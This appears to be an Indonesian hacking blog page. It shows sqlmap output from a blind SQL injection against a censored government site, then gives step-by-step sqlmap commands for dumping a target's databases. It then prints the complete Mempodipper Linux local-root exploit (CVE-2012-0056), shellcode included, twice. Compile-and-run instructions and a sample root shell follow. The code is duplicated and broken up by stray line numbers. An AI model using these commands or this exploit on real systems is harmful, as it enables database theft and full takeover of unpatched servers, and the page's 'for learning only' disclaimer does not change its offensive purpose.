[13:43:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

GET parameter 'newsid' is vulnerable. Do you want to keep testing the others? [y/N]

sqlmap identified the following injection points with a total of 36 HTnewsid(s) requests:

---

Place: GET

Parameter: newsid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: newsid=187 AND 309=309

---

[13:44:14] [INFO] testing MySQL

[13:44:16] [WARNING] the back-end DBMS is not MySQL

[13:44:16] [INFO] testing Oracle

[13:44:20] [INFO] confirming Oracle

[13:44:23] [INFO] the back-end DBMS is Oracle

[13:44:23] [INFO] actively fingerprinting Oracle

web server operating system: Linux Debian or Ubuntu 4.0 (etch)

web application technology: Apache 2.2.3, PHP 4.4.4

back-end DBMS: active fingerprint: Oracle 10g

[13:44:26] [INFO] Fetched data logged to text files under 'D:\binushacker\injection\output\<<sensor>>.gov'

[*] shutting down at: 13:44:26

Nah, dari sana kelihatan bahwa target “.gov” tersebut memiliki kelemahan di “boolean-based blind sql injection”
Selanjutnya, <<Di sensor, You Know Ya! >>

Berikut adalah beberapa command penting di SQLMAP
Untuk melakukan scanning terhadap Target [URL]
./sqlmap.py -u[url]
Untuk mendapatkan informasi database Target [URL]
./sqlmap.py -u[url] –dbs
Untuk mendapatkan informasi table di database Target [URL]
./sqlmap.py -u [url] –tables -D [database]
Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]
./sqlmap.py -u [url] –columns -T [table name] -D [databasename]
Untuk melakukan dump kolom, table dan database Target [URL]
./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]
Untuk melakukan dump spesifik kolom Target [URL]
./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]
Tutorial lengkap ada didalam video berikut:

Artikel tentang SQLMAP yang lainnya [By Ari Pratomo]
Hallo brother, kali ini ane ngepost video tutorial tentang sql injection menggunakan sqlmap di backtrack5, silahkan ikuti videonya dengan seksama hingga ahir, pasti anda langsung bisa

Sqlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini menurut saya, tools sql injection yang free paling lengkap untuk saat ini, walaupun ada havij, tapi menurut saya havij kurang advanced, havij lebih banyak dipakai oleh newbie newbie, karena memang kegunaan nya yang sangat simple untuk sekali attack sql injection
** Harap menjadi perhatian tindakan ini merupakan ilegal, tindakan ini semata-mata hanya sebagai pembelajaran saja. tutorial ini dibuat hanya untuk tujuan pembelajaran, Kesalahan penggunaan tools ditanggung jawab sepenuhnya oleh pengguna, Saya tidak bertanggung jawab atas tindakan yang akan anda lakukan.

Detailnya silakan tonton video dibawah:

Biar lengkap saya kasih step-stepnya:

Test injeksi dengan men-fetch banner mysql (versi mysql)

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner

Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db

Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)

Dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs

Fetch list tables di database portal dengan flag (-D nama_tabel –tables)

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables

Fetch isi kolum pada setiap tables dengan flag (–columns)

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel -T nama_kolom --columns

Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)

./sqlmap.py
 -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel 
 -T nama_kolom -C isi_kolom1,isi_kolom2 --dump

Selamat, anda sukses melakukan SQL Injection & selamat mencoba

Localroot Linux Exploit >= 2.6.39

Berikut adalah step-by-step cara melakukan root / ngeroot di dalam semua linux dengan kernel mulai dari 2.6.39 ke atas. Sudah lama tidak melakukan root’ing bukan, cara melakukannya adalah
1. Cari server dengan kernel 2.6.39 keatas yang belum di patch
2. Compile source code localroot exploit dengan menggunakan gcc
3. Jalankan localroot exploit

Berikut codenya untuk localroot exploit:

/*
 * Mempodipper
 * by zx2c4
 * 
 * Linux Local Root Exploit
 * 
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 * 
 * Enjoy.
 * 
 * - zx2c4
 * Jan 21, 2012
 * 
 * CVE-2012-0056
 */

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>

char *prog_name;

int send_fd(int sock, int fd)
{
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 int n;
 char cms[CMSG_SPACE(sizeof(int))];

 buf[0] = 0;
 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&msg, 0, sizeof msg);
 msg.msg_iov = &iov;
 msg.msg_iovlen = 1;
 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = CMSG_LEN(sizeof(int));

 cmsg = CMSG_FIRSTHDR(&msg);
 cmsg->cmsg_len = CMSG_LEN(sizeof(int));
 cmsg->cmsg_level = SOL_SOCKET;
 cmsg->cmsg_type = SCM_RIGHTS;
 memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

 if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
  return -1;
 close(sock);
 return 0;
}

int recv_fd(int sock)
{
 int n;
 int fd;
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 char cms[CMSG_SPACE(sizeof(int))];
 
 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&msg, 0, sizeof msg);
 msg.msg_name = 0;
 msg.msg_namelen = 0;
 msg.msg_iov = &iov;
 msg.msg_iovlen = 1;

 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = sizeof cms;

 if ((n = recvmsg(sock, &msg, 0)) < 0)
  return -1;
 if (n == 0)
  return -1;
 cmsg = CMSG_FIRSTHDR(&msg);
 memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
 close(sock);
 return fd;
}

unsigned long ptrace_address()
{
 int fd[2];
 printf("[+] Creating ptrace pipe.\n");
 pipe(fd);
 fcntl(fd[0], F_SETFL, O_NONBLOCK);

 printf("[+] Forking ptrace child.\n");
 int child = fork();
 if (child) {
  close(fd[1]);
  char buf;
  printf("[+] Waiting for ptraced child to give output on syscalls.\n");
  for (;;) {
   wait(NULL);
   if (read(fd[0], &buf, 1) > 0)
    break;
   ptrace(PTRACE_SYSCALL, child, NULL, NULL);
  }
  
  printf("[+] Error message written. Single stepping to find address.\n");
  struct user_regs_struct regs;
  for (;;) {
   ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
   wait(NULL);
   ptrace(PTRACE_GETREGS, child, NULL, ®s);
#if defined(__i386__)
#define instruction_pointer regs.eip
#define upper_bound 0xb0000000
#elif defined(__x86_64__)
#define instruction_pointer regs.rip
#define upper_bound 0x700000000000
#else
#error "That platform is not supported."
#endif
   if (instruction_pointer < upper_bound) {
    unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
    if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
     return instruction_pointer;
   }
  }
 } else {
  printf("[+] Ptrace_traceme'ing process.\n");
  if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
   perror("[-] ptrace");
   return 0;
  }
  close(fd[0]);
  dup2(fd[1], 2);
  execl("/bin/su", "su", "not-a-valid-user", NULL);
 }
 return 0;
}

unsigned long objdump_address()
{
 FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
 if (!command) {
  perror("[-] popen");
  return 0;
 }
 char result[32];
 fgets(result, 32, command);
 pclose(command);
 return strtoul(result, NULL, 16);
}

unsigned long find_address()
{
 printf("[+] Ptracing su to find next instruction without reading binary.\n");
 unsigned long address = ptrace_address();
 if (!address) {
  printf("[-] Ptrace failed.\n");
  printf("[+] Reading su binary with objdump to find exit@plt.\n");
  address = objdump_address();
  if (address == ULONG_MAX || !address) {
   printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
   printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
   exit(-1);
  }
 }
 printf("[+] Resolved call address to 0x%lx.\n", address);
 return address;
}

int su_padding()
{
 printf("[+] Calculating su padding.\n");
 FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
 if (!command) {
  perror("[-] popen");
  exit(1);
 }
 char result[256];
 fgets(result, 256, command);
 pclose(command);
 return strstr(result, "this-user-does-not-exist") - result;
}

int child(int sock)
{
 char parent_mem[256];
 sprintf(parent_mem, "/proc/%d/mem", getppid());
 printf("[+] Opening parent mem %s in child.\n", parent_mem);
 int fd = open(parent_mem, O_RDWR);
 if (fd < 0) {
  perror("[-] open");
  return 1;
 }
 printf("[+] Sending fd %d to parent.\n", fd);
 send_fd(sock, fd);
 return 0;
}

int parent(unsigned long address)
{
 int sockets[2];
 printf("[+] Opening socketpair.\n");
 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
  perror("[-] socketpair");
  return 1;
 }
 if (fork()) {
  printf("[+] Waiting for transferred fd in parent.\n");
  int fd = recv_fd(sockets[1]);
  printf("[+] Received fd at %d.\n", fd);
  if (fd < 0) {
   perror("[-] recv_fd");
   return 1;
  }
  printf("[+] Assigning fd %d to stderr.\n", fd);
  dup2(2, 15);
  dup2(fd, 2);

  unsigned long offset = address - su_padding();
  printf("[+] Seeking to offset 0x%lx.\n", offset);
  lseek64(fd, offset, SEEK_SET);
  
#if defined(__i386__)
  // See shellcode-32.s in this package for the source.
  char shellcode[] =
   "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
   "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
   "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
   "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
   "\x80";
#elif defined(__x86_64__)
  // See shellcode-64.s in this package for the source.
  char shellcode[] =
   "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
   "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
   "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
   "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
   "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
  printf("[+] Executing su with shellcode.\n");
  execl("/bin/su", "su", shellcode, NULL);
 } else {
  char sock[32];
  sprintf(sock, "%d", sockets[0]);
  printf("[+] Executing child from child fork.\n");
  execl("/proc/self/exe", prog_name, "-c", sock, NULL);
 }
 return 0;
}

int main(int argc, char **argv)
{
 prog_name = argv[0];
 
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
  return child(atoi(argv[2]));
 
 printf("===============================\n");
 printf("=          Mempodipper        =\n");
 printf("=           by zx2c4          =\n");
 printf("=         Jan 21, 2012        =\n");
 printf("===============================\n\n");
 
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
  return parent(strtoul(argv[2], NULL, 16));
 else
  return parent(find_address());
 
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

* Mempodipper

* by zx2c4

* Linux Local Root Exploit

* Rather than put my write up here, per usual, this time I've put it

* in a rather lengthy blog post: http://blog.zx2c4.com/749

* Enjoy.

* - zx2c4

* Jan 21, 2012

* CVE-2012-0056

#define _LARGEFILE64_SOURCE

#define _GNU_SOURCE

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <sys/socket.h>

#include <sys/un.h>

#include <sys/wait.h>

#include <sys/types.h>

#include <sys/user.h>

#include <sys/ptrace.h>

#include <sys/reg.h>

#include <fcntl.h>

#include <unistd.h>

#include <limits.h>

char *prog_name;

int send_fd(int sock, int fd)

{

char buf[1];

struct iovec iov;

struct msghdr msg;

struct cmsghdr *cmsg;

int n;

char cms[CMSG_SPACE(sizeof(int))];

buf[0] = 0;

iov.iov_base = buf;

iov.iov_len = 1;

memset(&msg, 0, sizeof msg);

msg.msg_iov = &iov;

msg.msg_iovlen = 1;

msg.msg_control = (caddr_t)cms;

msg.msg_controllen = CMSG_LEN(sizeof(int));

cmsg = CMSG_FIRSTHDR(&msg);

cmsg->cmsg_len = CMSG_LEN(sizeof(int));

cmsg->cmsg_level = SOL_SOCKET;

cmsg->cmsg_type = SCM_RIGHTS;

memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)

return -1;

close(sock);

return 0;

}

int recv_fd(int sock)

{

int n;

int fd;

char buf[1];

struct iovec iov;

struct msghdr msg;

struct cmsghdr *cmsg;

char cms[CMSG_SPACE(sizeof(int))];

iov.iov_base = buf;

iov.iov_len = 1;

memset(&msg, 0, sizeof msg);

msg.msg_name = 0;

msg.msg_namelen = 0;

msg.msg_iov = &iov;

msg.msg_iovlen = 1;

msg.msg_control = (caddr_t)cms;

msg.msg_controllen = sizeof cms;

if ((n = recvmsg(sock, &msg, 0)) < 0)

return -1;

if (n == 0)

return -1;

cmsg = CMSG_FIRSTHDR(&msg);

memmove(&fd, CMSG_DATA(cmsg), sizeof(int));

close(sock);

return fd;

}

unsigned long ptrace_address()

{

int fd[2];

printf("[+] Creating ptrace pipe.\n");

pipe(fd);

fcntl(fd[0], F_SETFL, O_NONBLOCK);

printf("[+] Forking ptrace child.\n");

int child = fork();

if (child) {

close(fd[1]);

char buf;

printf("[+] Waiting for ptraced child to give output on syscalls.\n");

for (;;) {

wait(NULL);

if (read(fd[0], &buf, 1) > 0)

break;

ptrace(PTRACE_SYSCALL, child, NULL, NULL);

}

printf("[+] Error message written. Single stepping to find address.\n");

struct user_regs_struct regs;

for (;;) {

ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);

wait(NULL);

ptrace(PTRACE_GETREGS, child, NULL, &regs);

#if defined(__i386__)

#define instruction_pointer regs.eip

#define upper_bound 0xb0000000

#elif defined(__x86_64__)

#define instruction_pointer regs.rip

#define upper_bound 0x700000000000

#else

#error "That platform is not supported."

#endif

if (instruction_pointer < upper_bound) {

unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);

if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)

return instruction_pointer;

}

} else {

printf("[+] Ptrace_traceme'ing process.\n");

if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {

perror("[-] ptrace");

return 0;

}

close(fd[0]);

dup2(fd[1], 2);

execl("/bin/su", "su", "not-a-valid-user", NULL);

}

return 0;

}

unsigned long objdump_address()

{

FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\$[^0]*\$/0x\\1/'", "r");

if (!command) {

perror("[-] popen");

return 0;

}

char result[32];

fgets(result, 32, command);

pclose(command);

return strtoul(result, NULL, 16);

}

unsigned long find_address()

{

printf("[+] Ptracing su to find next instruction without reading binary.\n");

unsigned long address = ptrace_address();

if (!address) {

printf("[-] Ptrace failed.\n");

printf("[+] Reading su binary with objdump to find exit@plt.\n");

address = objdump_address();

if (address == ULONG_MAX || !address) {

printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");

printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);

exit(-1);

}

printf("[+] Resolved call address to 0x%lx.\n", address);

return address;

}

int su_padding()

{

printf("[+] Calculating su padding.\n");

FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");

if (!command) {

perror("[-] popen");

exit(1);

}

char result[256];

fgets(result, 256, command);

pclose(command);

return strstr(result, "this-user-does-not-exist") - result;

}

int child(int sock)

{

char parent_mem[256];

sprintf(parent_mem, "/proc/%d/mem", getppid());

printf("[+] Opening parent mem %s in child.\n", parent_mem);

int fd = open(parent_mem, O_RDWR);

if (fd < 0) {

perror("[-] open");

return 1;

}

printf("[+] Sending fd %d to parent.\n", fd);

send_fd(sock, fd);

return 0;

}

int parent(unsigned long address)

{

int sockets[2];

printf("[+] Opening socketpair.\n");

if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {

perror("[-] socketpair");

return 1;

}

if (fork()) {

printf("[+] Waiting for transferred fd in parent.\n");

int fd = recv_fd(sockets[1]);

printf("[+] Received fd at %d.\n", fd);

if (fd < 0) {

perror("[-] recv_fd");

return 1;

}

printf("[+] Assigning fd %d to stderr.\n", fd);

dup2(2, 15);

dup2(fd, 2);

unsigned long offset = address - su_padding();

printf("[+] Seeking to offset 0x%lx.\n", offset);

lseek64(fd, offset, SEEK_SET);

#if defined(__i386__)

// See shellcode-32.s in this package for the source.

char shellcode[] =

"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"

"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"

"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"

"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"

"\x80";

#elif defined(__x86_64__)

// See shellcode-64.s in this package for the source.

char shellcode[] =

"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"

"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"

"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"

"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"

"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";

#else

#error "That platform is not supported."

#endif

printf("[+] Executing su with shellcode.\n");

execl("/bin/su", "su", shellcode, NULL);

} else {

char sock[32];

sprintf(sock, "%d", sockets[0]);

printf("[+] Executing child from child fork.\n");

execl("/proc/self/exe", prog_name, "-c", sock, NULL);

}

return 0;

}

int main(int argc, char **argv)

{

prog_name = argv[0];

if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')

return child(atoi(argv[2]));

printf("===============================\n");

printf("= Mempodipper =\n");

printf("= by zx2c4 =\n");

printf("= Jan 21, 2012 =\n");

printf("===============================\n\n");

if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')

return parent(strtoul(argv[2], NULL, 16));

else

return parent(find_address());

}

Silakan download disini toolnya:

Oke lets begin,
1. Save code di atas dengan nama: exploit.c
2. Compile exploit.c dengan menggunakan C compiler yaitu gcc, perintahnya seperti berikut gcc: exploit.c -o localrootexploit
3. Jalankan localrootexploit kita dengan mengetikkan perintah: ./localrootexploit
Kalau berhasil seperti berikut tampilannya

binushacker $ gcc exploit.c -o localrootexploit
binushacker $ ./localrootexploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.1# whoami
root
sh-4.1#

binushacker $ gcc exploit.c -o localrootexploit

binushacker $ ./localrootexploit

===============================

= Mempodipper =

= by zx2c4 =

= Jan 21, 2012 =

===============================

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/6454/mem in child.

[+] Sending fd 3 to parent.

[+] Received fd at 5.

[+] Assigning fd 5 to stderr.

[+] Reading su for exit@plt.

[+] Resolved exit@plt to 0x402178.

[+] Seeking to offset 0x40216c.

[+] Executing su with shellcode.

sh-4.1# whoami

root

sh-4.1#